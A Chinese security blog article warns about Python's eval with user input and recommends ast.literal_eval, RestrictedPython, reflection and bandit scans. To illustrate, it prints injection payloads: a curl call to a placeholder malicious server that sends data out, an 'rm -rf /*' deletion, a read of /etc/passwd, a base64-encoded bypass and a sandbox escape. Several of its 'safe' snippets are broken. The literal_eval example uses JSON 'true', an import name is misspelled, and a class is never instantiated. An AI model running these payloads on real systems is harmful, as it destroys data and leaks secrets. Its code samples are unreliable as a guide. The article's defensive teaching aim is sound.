还在用Python的eval处理用户输入？你的代码可能正在“裸奔”！

摘要：凌晨3点，程序员小王被急促的电话惊醒。线上系统突然删光了所有用户订单数据——仅仅因为一段用了eval的代码。这不是电影情节，而是某电商平台真实的安全事故。今天我们就来深挖这个潜伏在无数Python项目中的"定时炸弹"。

凌晨3点，程序员小王被急促的电话惊醒。线上系统突然删光了所有用户订单数据——仅仅因为一段用了eval的代码。这不是电影情节，而是某电商平台真实的安全事故。今天我们就来深挖这个潜伏在无数Python项目中的"定时炸弹"。

2022年某社交平台用户数据泄露事件中，攻击者通过注册接口注入了一段精心构造的字符串：

"__import__('os').popen('curl http://恶意服务器/steal_data')"

当这段字符被后端eval解析时，直接触发了服务器数据外传。整个过程就像把自家钥匙交给陌生人，攻击者可以在你的服务器上为所欲为。

1. 代码执行的"任意门"

eval('2+2')看似无害，但当用户输入变为：

"__import__('os').system('rm -rf /*')" # 删库跑路终极版

此时执行等同于在服务器终端输入危险命令，整个文件系统可能瞬间清空。

2. 作用域的"寄生虫"

观察这段代码：

API_KEY = "S3CR3T_KEY"def process_data(input_str): return eval(input_str)# 攻击者输入："API_KEY" print(process_data("API_KEY")) # 直接泄露密钥！

eval会像寄生虫一样吸取出当前作用域的所有变量，敏感信息直接暴露。

3. 性能的"黑洞"

在某个量化交易系统中，开发者用eval解析用户公式：

# 用户输入："sum([x**2 for x in range(1000000)])"result = eval(formula)

测试发现，相同计算逻辑，eval的执行效率比预编译代码慢30倍以上，直接导致交易策略失效。

▶ 组合拳攻击

payload = """(lambda: [ __import__('os').system('恶意命令'), open('/etc/passwd').read])"""eval(payload) # 同时执行命令+窃取数据

通过lambda匿名函数实现多重攻击链，防不胜防。

▶ 字符魔术

# 对"os.system('ls')"进行Base64编码encoded = b'X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk='eval(__import__('base64').b64decode(encoded)) # 解码执行

这种编码绕过手法能轻松突破简单的关键词过滤。

❌ 命名空间限制

# 开发者尝试禁用内置函数eval(user_input, {"__builtins__": None}, {})

但攻击者仍可通过：

# 通过类型对象的__subclasses__获取os模块.__class__.__base__.__subclasses__[84]._module.__builtins__['os']

完全绕过防护，此漏洞在CTF竞赛中屡见不鲜。

❌ 正则过滤

试图用正则表达式屏蔽import、os等关键词？

看这段payload：

"__imp"+"ort__('o'+'s').system('命令')" # 字符串拼接轻松突破

动态构造技术让关键词过滤形同虚设。

1. 数据解析就用它

import ast# 安全解析数据结构config = ast.literal_eval('{"debug": true, "port": 8080}')

ast.literal_eval支持99%的配置解析需求，且绝对安全。

2. 沙箱环境终极防护

对必须执行动态代码的场景：

from RestrictedPython import compile_Restricted# 白名单机制allowed_builtins = ['len', 'sum', 'max']code = compile_restricted(user_code, '', 'eval')eval(code, {"__builtins__": {func: __builtins__[func] for func in allowed_builtins}})

通过RestrictedPython实现代码监狱，即使出问题也不会越狱。

3. 反射代替执行

当需要根据字符串调用方法时：

class DataProcessor: def analyze(self, method_name): if hasattr(self, method_name): return getattr(self, method_name) raise ValueError("非法方法")processor = DataProcessorprocessor.analyze('safe_calculation') # 反射调用代替eval

1、代码审计阶段

使用bandit扫描工具：bandit -r . -t B307。

重点检查所有eval、exec、pickle等高风险函数。

2、架构设计层面

动态计算服务独立部署在Docker容器。

开启Linux内核的seccomp沙箱模式。

3、应急响应预案

监控系统调用：strace -f -e trace=process python script.py。

网络层设置出站流量白名单。

在网络安全攻防战中，eval就像打开了大门的保险库。与其在漏洞出现后亡羊补牢，不如从架构设计阶段就封死这个潘多拉魔盒。记住：真正的技术高手，从不会把系统安全寄托在"用户不会输入恶意代码"的幻想上。

你还在用eval吗？欢迎在评论区分享你的防护经验。

来源：信息科技云课堂